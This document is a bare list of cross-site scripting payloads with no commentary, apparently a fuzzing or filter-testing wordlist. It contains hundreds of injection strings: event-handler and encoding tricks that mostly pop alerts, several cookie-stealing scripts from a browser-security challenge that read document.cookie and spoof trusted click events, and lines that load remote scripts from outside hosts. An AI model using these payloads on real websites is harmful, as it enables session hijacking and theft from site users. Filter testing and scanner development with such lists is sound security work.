<wbr draggable="true" ondragend="alert(573)">test</wbr>
<wbr draggable="true" ondragenter="alert(842)">test</wbr>
<wbr draggable="true" ondragleave="alert(457)">test</wbr>
<wbr draggable="true" ondragstart="alert(933)">test</wbr>
<wbr id=x tabindex=1 onactivate=alert(583)></wbr>
<wbr id=x tabindex=1 onbeforeactivate=alert(583)></wbr>
<wbr id=x tabindex=1 onbeforedeactivate=alert(450)></wbr><input autofocus>
<wbr id=x tabindex=1 ondeactivate=alert(514)></wbr><input id=y autofocus>
<wbr id=x tabindex=1 onfocus=alert(197)></wbr>
<wbr id=x tabindex=1 onfocusin=alert(742)></wbr>
<wbr onbeforecopy="alert(427)" contenteditable>test</wbr>
<wbr onbeforecut="alert(281)" contenteditable>test</wbr>
<wbr onbeforepaste="alert(832)" contenteditable>test</wbr>
<wbr onblur=alert(353) tabindex=1 id=x></wbr><input autofocus>
<wbr onclick="alert(431)">test</wbr>
<wbr oncontextmenu="alert(622)">test</wbr>
<wbr oncopy="alert(655)" contenteditable>test</wbr>
<wbr oncut="alert(883)" contenteditable>test</wbr>
<wbr ondblclick="alert(725)">test</wbr>
<wbr onfocusout=alert(841) tabindex=1 id=x></wbr><input autofocus>
<wbr onkeydown="alert(323)" contenteditable>test</wbr>
<wbr onkeypress="alert(192)" contenteditable>test</wbr>
<wbr onkeyup="alert(873)" contenteditable>test</wbr>
<wbr onmousedown="alert(427)">test</wbr>
<wbr onmouseenter="alert(588)">test</wbr>
<wbr onmouseleave="alert(254)">test</wbr>
<wbr onmousemove="alert(143)">test</wbr>
<wbr onmouseout="alert(220)">test</wbr>
<wbr onmouseover="alert(548)">test</wbr>
<wbr onmouseup="alert(535)">test</wbr>
<wbr onpaste="alert(473)" contenteditable>test</wbr>
<xmp draggable="true" ondrag="alert(902)">test</xmp>
<xmp draggable="true" ondragend="alert(173)">test</xmp>
<xmp draggable="true" ondragenter="alert(967)">test</xmp>
<xmp draggable="true" ondragleave="alert(431)">test</xmp>
<xmp draggable="true" ondragstart="alert(814)">test</xmp>
<xmp id=x tabindex=1 onactivate=alert(430)></xmp>
<xmp id=x tabindex=1 onbeforeactivate=alert(205)></xmp>
<xmp id=x tabindex=1 onbeforedeactivate=alert(931)></xmp><input autofocus>
<xmp id=x tabindex=1 ondeactivate=alert(271)></xmp><input id=y autofocus>
<xmp id=x tabindex=1 onfocus=alert(872)></xmp>
<xmp id=x tabindex=1 onfocusin=alert(421)></xmp>
<xmp onbeforecopy="alert(829)" contenteditable>test</xmp>
<xmp onbeforecut="alert(106)" contenteditable>test</xmp>
<xmp onbeforepaste="alert(134)" contenteditable>test</xmp>
<xmp onblur=alert(373) tabindex=1 id=x></xmp><input autofocus>
<xmp onclick="alert(494)">test</xmp>
<xmp oncontextmenu="alert(935)">test</xmp>
<xmp oncopy="alert(980)" contenteditable>test</xmp>
<xmp oncut="alert(773)" contenteditable>test</xmp>
<xmp ondblclick="alert(429)">test</xmp>
<xmp onfocusout=alert(119) tabindex=1 id=x></xmp><input autofocus>
<xmp onkeydown="alert(582)" contenteditable>test</xmp>
<xmp onkeypress="alert(202)" contenteditable>test</xmp>
<xmp onkeyup="alert(758)" contenteditable>test</xmp>
<xmp onmousedown="alert(473)">test</xmp>
<xmp onmouseenter="alert(447)">test</xmp>
<xmp onmouseleave="alert(927)">test</xmp>
<xmp onmousemove="alert(340)">test</xmp>
<xmp onmouseout="alert(361)">test</xmp>
<xmp onmouseover="alert(484)">test</xmp>
<xmp onmouseup="alert(809)">test</xmp>
<xmp onpaste="alert(344)" contenteditable>test</xmp>
<xss id=x tabindex=1 onactivate=alert(899)></xss>
<xss id=x tabindex=1 onbeforeactivate=alert(323)></xss>
<xss id=x tabindex=1 onbeforedeactivate=alert(575)></xss><input autofocus>
<xss id=x tabindex=1 onblur=alert(166)></xss><input autofocus>
<xss id=x tabindex=1 ondeactivate=alert(921)></xss><input autofocus>
<xss id=x tabindex=1 onfocus=alert(912)></xss>
<xss id=x tabindex=1 onfocusin=alert(705)></xss>
<xss id=x tabindex=1 onfocusout=alert(113)></xss><input autofocus>
'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E
<<scr\0ipt/src=http://xss.com/xss.js></script
%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E
' onmouseover=alert(/XSS/)
"><iframe%20src="http://google.com"%%203E
'<script>window.onload=function(){document.forms[0].message.value='1';}</script>
x”</title><img src%3dx onerror%3dalert(669)>
<script> document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click(); </script>
<script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script>
<script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();</script>
<script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script>
<script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>
<script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script>
<script>alert(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script>
<script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script>
<%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74>
<script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22);  xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{   var c;   if (c=xdr.responseText.match(/document.cookie = '(.*%3F)'/) )    alert(c[1]); }catch(e){} };  xdr.send(); </script>
<iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() {    return document.cookie }}); alert(Safe.get());</script>
<script>alert(document.head.innerHTML.substr(146,20));</script>
<script>alert(document.head.childNodes[3].text)</script>
<script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}</script>
<script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});alert(Safe.get())</script>
<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script>
<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script>
<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>
<script> document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true}); </script>
<script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click';  document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test); </script>
<script>  (function (o) {   function exploit(x) {    if (x !== null)     alert('User cookie is ' %2B x);    else     console.log('fail');   }      o.onclick = function (e) {    e.__defineGetter__('isTrusted', function () { return true; });    exploit(Safe.get());   };      var e = document.createEvent('MouseEvent');   e.initEvent('click', true, true);   o.dispatchEvent(e);  })(document.getElementById('safe123')); </script>
<iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe>
<script>     function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script> 
<img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> #
<script>  function foo(elem, doc, text) {   elem.onclick = function (e) {    e.__defineGetter__(text[0], function () { return true })    alert(Safe.get());   };      var event = doc.createEvent(text[1]);   event.initEvent(text[2], true, true);   elem.dispatchEvent(event);  } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> # 
<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT>#
<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>#
<video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23
<script for=document event=onreadystatechange>getElementById('safe123').click()</script>
<script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script>
<script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script>
<iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
<iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
<iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
<iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
<script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });alert(get());})();};safe123.click();</script>#
<iframe onload=%22write('<script>'%2Blocation.hash.substr(970)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>
<textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea>
<iframe onload=%22write('<script>'%2Blocation.hash.substr(959)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>
<script>function x(window) { eval(location.hash.substr(755)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
<textarea id=ta onfocus=%22write('<script>alert(959)</script>')%22 autofocus></textarea>
<object data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22>
<script>function x(window) { eval(location.hash.substr(865)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
%3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E
<iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`>
<a target="x" href="xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E
<a target="x" href="xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe>
<a target="x" href="xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(445).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script>
<a target="x" href="xssme?xss=<script>function x(window) { eval(location.hash.substr(826)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
Garethy Salty Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script>
<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
<div onmouseover='alert&lpar;1&rpar;'>DIV</div>
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(185)">
<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> ?
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">?
<var onmouseover="prompt(550)">On Mouse Over</var>?
<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
<img src="/" =_=" title="onerror='prompt(488)'">
<%<!--'%><script>alert(918);</script -->
<script src="data:text/javascript,alert(560)"></script>
<iframe/src \/\/onload = prompt(323)
<iframe/onreadystatechange=alert(711)
<svg/onload=alert(625)
<input value=<><iframe/src=javascript:confirm(165)
<input type="text" value=``<div/onmouseover='alert(362)'>X</div>
http://www.<script>alert(359)</script .com
<iframe  src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> ?
<svg><script ?>alert(758)
<iframe  src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
<img src=`xx:xx`onerror=alert(201)>
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
<meta http-equiv="refresh" content="0;javascript&colon;alert(276)"/>?
<math><a xlink:href="//jsfiddle.net/t846h/">click
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>?
<svg contentScriptType=text/vbs><script>MsgBox+1
<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(497)>">X</a
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
<script>~'\u0061' ;  \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073.  \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script ????????????
<object data=javascript&colon;\u0061&#x6C;&#101%72t(539)>
<script>+-+-1-+-+alert(850)</script>
<body/onload=&lt;!--&gt;&#10alert(621)>
<script itworksinallbrowsers>/*<script* */alert(416)</script ?
<img src ?itworksonchrome?\/onerror = alert(526)???
<svg><script>//&NewLine;confirm(712);</script </svg>
<svg><script onlypossibleinopera:-)> alert(348)
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa  aaaaaaaaa aaaaaaaaaa  href=j&#97v&#97script&#x3A;&#97lert(416)>ClickMe
<script x> alert(546) </script 1=2
<div/onmouseover='alert(175)'> style="x:">
<--`<img/src=` onerror=alert(322)> --!>
<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(739)></script> ?
<div  style="position:absolute;top:0;left:0;width:100%;height:100%"  onmouseover="prompt(585)" onclick="alert(508)">x</button>?
"><img src=x onerror=window.open('https://www.google.com/');>
<form><button formaction=javascript&colon;alert(228)>CLICKME
<math><a xlink:href="//jsfiddle.net/t846h/">click
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>?
<iframe  src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
<a  href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click  Me</a>
"><img src=x onerror=prompt(194);>
<SCRIPT>alert('XSS952');</SCRIPT>
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS983');">
<IMG SRC=javascript:alert('XSS440')>
<IMG SRC=JaVaScRiPt:alert('XSS764')>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG SRC=`javascript:alert("RSnake says, 'XSS423'")`>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
SRC=&#10<IMG 6;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="jav	ascript:alert('XSS566');">
<IMG SRC="jav&#x09;ascript:alert('XSS764');">
<IMG SRC="jav&#x0A;ascript:alert('XSS390');">
<IMG SRC="jav&#x0D;ascript:alert('XSS695');">
<IMG SRC=" &#14;  javascript:alert('XSS208');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
<IMG SRC="javascript:alert('XSS193')"
<SCRIPT>a=/XSS/
\";alert('XSS893');//
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS708');">
<BODY BACKGROUND="javascript:alert('XSS467')">
<BODY ONLOAD=alert('XSS864')>
<IMG DYNSRC="javascript:alert('XSS190')">
<IMG LOWSRC="javascript:alert('XSS780')">
<BGSOUND SRC="javascript:alert('XSS582');">
<BR SIZE="&{alert('XSS351')}">
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
<LINK REL="stylesheet" HREF="javascript:alert('XSS642');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<IMG SRC='vbscript:msgbox("XSS740")'>
<IMG SRC="mocha:[code]">
<IMG SRC="livescript:[code]">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS847');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="Link" Content="<javascript:alert('XSS252')>; REL=stylesheet">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS947');">
<IFRAME SRC="javascript:alert('XSS343');"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS238');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS143')">
<DIV STYLE="background-image: url(javascript:alert('XSS331'))">
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS939'))">
<DIV STYLE="width: expression(alert('XSS428'));">
<STYLE>@im\port'\ja\vasc\ript:alert("XSS910")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS297'))">
<XSS STYLE="xss:expression(alert('XSS695'))">
exp/*<XSS STYLE='no\xss:noxss("*//*");
<STYLE TYPE="text/javascript">alert('XSS680');</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert('XSS421')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS794')")}</STYLE>
<BASE HREF="javascript:alert('XSS938');//">
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS658')></OBJECT>
getURL("javascript:alert('XSS729')")
a="get";
<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:alert('XSS434');">
<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>
<HTML><BODY>
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
